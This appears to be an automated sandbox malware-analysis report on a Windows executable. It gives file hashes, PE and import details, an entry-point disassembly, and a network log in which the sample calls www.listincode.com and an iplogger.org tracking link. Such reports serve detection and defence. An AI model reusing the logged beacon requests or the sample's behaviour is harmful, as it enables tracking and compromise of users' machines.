Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.6.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15FA.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4563
Entropy (8bit):	4.448787248721358
Encrypted:	false
SSDEEP:	48:cvIwSD8zseJgtWI9s6WSC8BC8fm8M4J9ZUPDt8UPDfFv9+q8IwPDkqPDy2cLzjz8:uITfUD7SNNJEPJ9W5NATLyd
MD5:	46B09129D53D181476C2B3A66B244CD3
SHA1:	C8607F18595D9772D30C4F9AD7C2CBF175B85653
SHA-256:	D27CA5EFD48A815BB907266467D07F3CD00AE72F5D5DAC3209231D55975EE041
SHA-512:	B7324390A5D2ACD5F29E93AC4BDEE5724E1AFAE0246B8190E90D54D79BB065FED89C42C9E542DE8E765E5EA65C52E020021108DE8CB6E7FFAB5BC0D566253765
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1377037" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Feb 7 21:26:54 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	134202
Entropy (8bit):	1.9378077508361713
Encrypted:	false
SSDEEP:	768:R00P76GMXGIlIfcPXbUX7O2y8StGeh7l6iQ:R0nXGItPXgX7O1Geh7s5
MD5:	60BA5D7ADCD352B28BCBF2FB09AFD8B8
SHA1:	0ED8A2DC9A893120E3D6429674C700163CF17457
SHA-256:	64D279B38BDCDC6BFC88A1D12997A94048DDAB5DCF8663376AEDB1F88DE18A65
SHA-512:	2F0A601FC47985427D12AC5432160B1275C3D0CF9ABCCF567B54BF872CEBE3EDF65CFC3A1CEC2677C1344D11CCD007FE52C92FD91DC261302C24AE77BD25CADB
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........b............D...........,...L............Q..........T.......8...........T............J..R...........x#..........d%...................................................................U...........B.......%......GenuineIntelW...........T..............b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.269959507307803
Encrypted:	false
SSDEEP:	12288:g1ELwOcPRtkusvwQxrMwEwm6I8HVntmE5EhmZtNXwI+Sb4N4zWRiY:GELwOcPRtkusvwZ0
MD5:	8C8D04D1B467BC710E6E73A4C6203EC2
SHA1:	5A83C7A57EEDF47B2A78DBB2AB5919D78B315C29
SHA-256:	631D06C63ABAED17184B137F6C2690DFF4EE1664F89939E2646E1DFBF5580D51
SHA-512:	A32F03023B112FC60662821479FE360F4675414099970FEEE202FEC3E6B6F9DB1B89FD152A24747224037A467FF3574F9BB17623C865ADA87DF6DBFD8BB3579D
Malicious:	false
Reputation:	low
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...li................................................................................................................................................................................................................................................................................................................................................q.1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.204371443370176
Encrypted:	false
SSDEEP:	768:axqXPdCeMwqhFrGCAL5ftx1+J4X3FFU7gBqX7eq5QMVyi6ai4LXauzmhQW:6fFwYsbCRx/
MD5:	32C0CC9050A60C9457F119DE3C808A88
SHA1:	F928BA06A603118127AAAD88AFF5B6A7BC10C379
SHA-256:	2700503E2B0C15C4A9C6806461892075101648CD14207607E5FDF4FF741F4C82
SHA-512:	1CF46D1126892617FA440ED0D8252258BC1B64C8D15850F104D217C5639A60FC7984FD6F8828484523A2EC4C966C8AFBEF4C430BEB4E104C4192B93AFF1745D6
Malicious:	false
Reputation:	low
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...li................................................................................................................................................................................................................................................................................................................................................q.1HvLE........Y............hu.YH.?....?........... ....... .......P.......0................... ..hbin................p.\..,..........nk,....li.......0........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....li....... ........................... .......Z.......................Root........lf......Root....nk ....li....................}.............. ...............*...............DeviceCensus.......................vk..................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.713072903710455
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8A3kk3sc5r.exe
File size:	1501184
MD5:	eedfa32e8a73f543f237b4f9ae575176
SHA1:	abf870b3c7bfaff9a0a1bec1fdabb93853696114
SHA256:	1ceb2e740663635ec5944806dc83db30f907c6ea531e57766b46b57a9e250558
SHA512:	50356b37470a25d7888174546d89cf46d43a7c046f5e26cfa1f5a5f08a1ad16ea212278086c53f00c23ce8655def8036d0ebecf412e4facefd7a06375e1c61a9
SSDEEP:	24576:VLtp6U1CeUj9HZyQKSdlU5ZIn2MqEs9NWkH9S6RJaV3vfBC:VppznU5G027YkH9S6RJalfBC
File Content Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......Z29k.SW8.SW8.SW8.8T9.SW8.8R9.SW8L&R9OSW8L&S9.SW8L&T9.SW8.&_9.SW8.8S9.SW8.8Q9.SW8.8V9.SW8.SV8.SW8.&S9.SW8.&R9.SW8.&.8.SW8.S.8.SW

File Icon


Icon Hash:	e8c6ccc4c4c4e878

Static PE Info

General

Entrypoint:	0x4e7363
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61FCA2E3 [Fri Feb 4 03:52:03 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d69e4c13e25f0ad622344ac56118c0df

Entrypoint Preview

Instruction
call 00007FF294CC42FDh
jmp 00007FF294CC3CD9h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00529C4Ch
mov dword ptr [ecx], 0051B510h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FF294CC3E3Fh
push 00545F6Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FF294CC5CE3h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FF294C72CE5h
push 00542220h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FF294CC5CC6h
int3
int3
push 004EB350h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [00548944h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
push ebp
mov ebp, esp
and dword ptr [0054E488h], 00000000h
sub esp, 24h
or dword ptr [00548960h], 01h
push 0000000Ah
call dword ptr [0051B1D4h]
test eax, eax
je 00007FF294CC400Fh
and dword ptr [ebp+00h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x146904	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x151000	0x1d1a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x16f000	0x8188	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x13e990	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x13eac0	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x13e9c8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11b000	0x30c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x113821	0x113a00	False	0.504362422052	data	6.55306989594	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.bdkkxia	0x115000	0x585a	0x5a00	False	0.467838541667	data	6.00358917956	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x11b000	0x2cac2	0x2cc00	False	0.451619238827	data	5.83294945602	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x148000	0x77a4	0x2e00	False	0.252632472826	data	3.89134226287	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bdkkxia	0x150000	0x50	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x151000	0x1d1a8	0x1d200	False	0.558887137876	data	6.64436838017	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x16f000	0x8188	0x8200	False	0.710667067308	data	6.66070777102	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
ZIP	0x161b50	0xc4d6	Zip archive data, at least v1.0 to extract	Chinese	China
RT_ICON	0x151180	0x10828	dBase III DBT, version number 0, next free block index 40	Chinese	China
RT_GROUP_ICON	0x1619a8	0x14	data	Chinese	China
RT_VERSION	0x1619c0	0x18c	PGP symmetric key encrypted data - Plaintext or unencrypted data	Chinese	China
RT_MANIFEST	0x16e028	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	GetComputerNameW, GetModuleFileNameA, GetCurrentProcessId, OpenProcess, GetModuleFileNameW, SetLastError, WaitForSingleObject, CreateEventW, FreeLibrary, WinExec, GetPrivateProfileStringW, CopyFileW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, LocalFree, LocalAlloc, LoadResource, FindResourceW, SizeofResource, LockResource, GetTickCount, GetCurrentThread, Sleep, GetProcessHeap, HeapAlloc, GetLastError, GetTempPathA, SetCurrentDirectoryW, GetShortPathNameA, LoadLibraryW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, SystemTimeToFileTime, DosDateTimeToFileTime, GetCurrentProcess, DuplicateHandle, CloseHandle, WriteFile, SetFileTime, SetFilePointer, ReadFile, GetFileType, CreateFileW, CreateDirectoryW, TerminateProcess, GetCurrentDirectoryW, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, GetTimeZoneInformation, GetFileSizeEx, GetConsoleOutputCP, SetFilePointerEx, ReadConsoleW, GetConsoleMode, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetCommandLineW, GetCommandLineA, GetStdHandle, ExitProcess, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, RtlUnwind, RaiseException, GetStringTypeW, WriteConsoleW, GetCPInfo, CompareStringEx, LCMapStringEx, DecodePointer, EncodePointer, InitializeCriticalSectionEx, InitializeSListHead, GetStartupInfoW, IsDebuggerPresent, GetModuleHandleW, ResetEvent, SetEvent, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FlushFileBuffers, QueryPerformanceCounter, MapViewOfFile, CreateFileMappingW, AreFileApisANSI, TryEnterCriticalSection, HeapCreate, HeapFree, EnterCriticalSection, GetFullPathNameW, GetDiskFreeSpaceW, OutputDebugStringA, LockFile, LeaveCriticalSection, InitializeCriticalSection, GetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, FormatMessageW, GetDiskFreeSpaceA, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, FlushViewOfFile, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, GetSystemInfo, HeapCompact, HeapDestroy, UnlockFile, LockFileEx, GetFileSize, DeleteCriticalSection, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA
ADVAPI32.dll	LookupPrivilegeValueW, AdjustTokenPrivileges, LookupAccountNameW, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, SetSecurityDescriptorDacl, IsValidSecurityDescriptor, InitializeSecurityDescriptor, InitializeAcl, GetTokenInformation, GetLengthSid, FreeSid, EqualSid, DuplicateToken, AllocateAndInitializeSid, AddAccessAllowedAce, AccessCheck, OpenThreadToken, OpenProcessToken
SHELL32.dll	ShellExecuteExA
ole32.dll	CoInitializeEx, CoGetObject, CoUninitialize
WININET.dll	InternetGetCookieExA
NETAPI32.dll	Netbios
ntdll.dll	RtlInitUnicodeString, NtFreeVirtualMemory, LdrEnumerateLoadedModules, RtlEqualUnicodeString, RtlAcquirePebLock, NtAllocateVirtualMemory, RtlReleasePebLock, RtlNtStatusToDosError, RtlCreateHeap, RtlDestroyHeap, RtlAllocateHeap, RtlFreeHeap, NtClose, NtOpenKey, NtEnumerateValueKey, NtQueryValueKey

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2019
FileVersion	1.0.0.1
ProductVersion	1.0.0.1
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2022 13:26:48.482846022 CET	49748	443	192.168.2.3	149.28.253.196
Feb 7, 2022 13:26:48.482920885 CET	443	49748	149.28.253.196	192.168.2.3
Feb 7, 2022 13:26:48.483072996 CET	49748	443	192.168.2.3	149.28.253.196
Feb 7, 2022 13:26:48.767585039 CET	49748	443	192.168.2.3	149.28.253.196
Feb 7, 2022 13:26:48.767641068 CET	443	49748	149.28.253.196	192.168.2.3
Feb 7, 2022 13:26:49.200148106 CET	443	49748	149.28.253.196	192.168.2.3
Feb 7, 2022 13:26:49.200313091 CET	49748	443	192.168.2.3	149.28.253.196
Feb 7, 2022 13:26:49.500679016 CET	49748	443	192.168.2.3	149.28.253.196
Feb 7, 2022 13:26:49.500720978 CET	443	49748	149.28.253.196	192.168.2.3
Feb 7, 2022 13:26:49.501080990 CET	443	49748	149.28.253.196	192.168.2.3
Feb 7, 2022 13:26:49.501167059 CET	49748	443	192.168.2.3	149.28.253.196
Feb 7, 2022 13:26:49.504626036 CET	49748	443	192.168.2.3	149.28.253.196
Feb 7, 2022 13:26:49.545888901 CET	443	49748	149.28.253.196	192.168.2.3
Feb 7, 2022 13:26:49.648369074 CET	443	49748	149.28.253.196	192.168.2.3
Feb 7, 2022 13:26:49.648447037 CET	443	49748	149.28.253.196	192.168.2.3
Feb 7, 2022 13:26:49.648453951 CET	49748	443	192.168.2.3	149.28.253.196
Feb 7, 2022 13:26:49.648505926 CET	49748	443	192.168.2.3	149.28.253.196
Feb 7, 2022 13:26:49.648938894 CET	49748	443	192.168.2.3	149.28.253.196
Feb 7, 2022 13:26:49.648977041 CET	443	49748	149.28.253.196	192.168.2.3
Feb 7, 2022 13:26:49.812791109 CET	49749	443	192.168.2.3	148.251.234.83
Feb 7, 2022 13:26:49.812840939 CET	443	49749	148.251.234.83	192.168.2.3
Feb 7, 2022 13:26:49.812961102 CET	49749	443	192.168.2.3	148.251.234.83
Feb 7, 2022 13:26:49.813680887 CET	49749	443	192.168.2.3	148.251.234.83
Feb 7, 2022 13:26:49.813705921 CET	443	49749	148.251.234.83	192.168.2.3
Feb 7, 2022 13:26:49.900763035 CET	443	49749	148.251.234.83	192.168.2.3
Feb 7, 2022 13:26:49.900859118 CET	49749	443	192.168.2.3	148.251.234.83
Feb 7, 2022 13:26:49.910506964 CET	49749	443	192.168.2.3	148.251.234.83
Feb 7, 2022 13:26:49.910525084 CET	443	49749	148.251.234.83	192.168.2.3
Feb 7, 2022 13:26:49.910936117 CET	443	49749	148.251.234.83	192.168.2.3
Feb 7, 2022 13:26:49.911015034 CET	49749	443	192.168.2.3	148.251.234.83
Feb 7, 2022 13:26:49.911668062 CET	49749	443	192.168.2.3	148.251.234.83
Feb 7, 2022 13:26:49.941741943 CET	443	49749	148.251.234.83	192.168.2.3
Feb 7, 2022 13:26:49.941833019 CET	443	49749	148.251.234.83	192.168.2.3
Feb 7, 2022 13:26:49.942055941 CET	49749	443	192.168.2.3	148.251.234.83
Feb 7, 2022 13:26:49.963295937 CET	49749	443	192.168.2.3	148.251.234.83
Feb 7, 2022 13:26:49.963327885 CET	443	49749	148.251.234.83	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2022 13:26:48.448700905 CET	64021	53	192.168.2.3	8.8.8.8
Feb 7, 2022 13:26:48.467427015 CET	53	64021	8.8.8.8	192.168.2.3
Feb 7, 2022 13:26:49.790378094 CET	60784	53	192.168.2.3	8.8.8.8
Feb 7, 2022 13:26:49.807157040 CET	53	60784	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 7, 2022 13:26:48.448700905 CET	192.168.2.3	8.8.8.8	0xa8e6	Standard query (0)	www.listincode.com	A (IP address)	IN (0x0001)
Feb 7, 2022 13:26:49.790378094 CET	192.168.2.3	8.8.8.8	0xbc58	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 7, 2022 13:26:48.467427015 CET	8.8.8.8	192.168.2.3	0xa8e6	No error (0)	www.listincode.com		149.28.253.196	A (IP address)	IN (0x0001)
Feb 7, 2022 13:26:49.807157040 CET	8.8.8.8	192.168.2.3	0xbc58	No error (0)	iplogger.org		148.251.234.83	A (IP address)	IN (0x0001)

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49748	149.28.253.196	443	C:\Users\user\Desktop\8A3kk3sc5r.exe

Timestamp	Direction	Data
2022-02-07 12:26:49 UTC	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Host: www.listincode.com Cache-Control: no-cache
2022-02-07 12:26:49 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Feb 2022 12:26:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2 Connection: close X-Powered-By: PHP/5.6.40 Access-Control-Allow-Origin: *
2022-02-07 12:26:49 UTC	IN	Data Raw: 55 53 Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49749	148.251.234.83	443	C:\Users\user\Desktop\8A3kk3sc5r.exe

Timestamp	kBytes transferred	Direction	Data
2022-02-07 12:26:49 UTC	0	OUT	GET /1GWfv7 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Host: iplogger.org Cache-Control: no-cache
2022-02-07 12:26:49 UTC	0	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Feb 2022 12:26:49 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close Set-Cookie: clhf03028ja=102.129.143.61; expires=Tue, 07-Feb-2023 12:26:49 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: 289220101719766845=2; expires=Tue, 07-Feb-2023 12:26:49 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Cache-Control: no-store, no-cache, must-revalidate Expires: Mon, 07 Feb 2022 12:26:49 +0000 Answers: whoami: 1858f8a2abf389ffaf1a25bb79ef270fcae065bf4de65bc51feb915c76c22928 Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY
2022-02-07 12:26:49 UTC	1	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0

Statistics

High Level Behavior Distribution

Click to dive into process behavior distribution

Disassembly

Reset < >

Analysis Process: 8A3kk3sc5r.exePID: 4360, Parent PID: 6016COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.4%
Total number of Nodes:	58
Total number of Limit Nodes:	8

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00E773BE,?,?,?,00E773BE,00E3E1E3,00ED2220,00E3E1E3), ref: 00E7927F

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 68d898167f3cd0714dc73889b3404b48793169f266e3a23e23bd6b0f046308c0
Instruction ID: 56c2446948c26105590dcd144f2b3aa4453dcb51411e5e6b34be3f45107322e0
Opcode Fuzzy Hash: 68d898167f3cd0714dc73889b3404b48793169f266e3a23e23bd6b0f046308c0
Instruction Fuzzy Hash: C701A735900208AFD701AF59E940B9EBBB9FF48704F158159E908AB766E770AE00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00E8EC2C Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,00E3E1E3,00000000,?,00E8E853,00000001,00000364,00000006,000000FF,?,00000000,?,00E804DE,00E8E9A0), ref: 00E8EC6D

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 104ef3f0d9707003c4e959a4fbf857677afad7a7ed79e3918fa3969e73db5911
Instruction ID: 697590661319cabcea0bff62409ab0d30dd8691850c8bdcd5ad4e6615e44f163
Opcode Fuzzy Hash: 104ef3f0d9707003c4e959a4fbf857677afad7a7ed79e3918fa3969e73db5911
Instruction Fuzzy Hash: 5AF0E931E012B4AA9B613A769D49A5BB788BF41770B19A116AC1CFA390CB31DC0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E7662F Relevance: 1.5, APIs: 1, Instructions: 39
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

stdext::threads::lock_error::lock_error.LIBCPMTD ref: 00E773AB

Part of subcall function 00E7921F: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00E773BE,?,?,?,00E773BE,00E3E1E3,00ED2220,00E3E1E3), ref: 00E7927F

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
